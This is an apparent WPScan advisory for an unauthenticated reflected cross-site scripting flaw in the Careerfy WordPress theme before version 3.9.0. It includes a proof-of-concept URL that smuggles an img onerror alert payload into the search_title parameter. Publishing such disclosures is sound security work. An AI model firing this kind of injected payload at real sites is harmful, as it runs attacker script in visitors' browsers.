Careerfy < 3.9.0 - Unauthenticated Reflected Cross-Site Scripting (XSS)



Description
There is a XSS vulnerability in Careerfy.
Proof of Concept
https://careerfy.net/demo/jobs-listing/?search_title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&location=&loc_radius=50&sector_cat=

Affects Theme

fixed in version 3.9.0

References

URL https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Original Researcher Daniel Ruf
Submitter Daniel Ruf
Submitter Website https://daniel-ruf.de
Submitter Twitter DanielRufde
Views 1011
Verified Yes
WPVDB ID 10254

Timeline

Publicly Published 2020-06-03 (about 1 month ago)
Added 2020-06-03 (about 1 month ago)
Last Updated 2020-06-04 (about 1 month ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin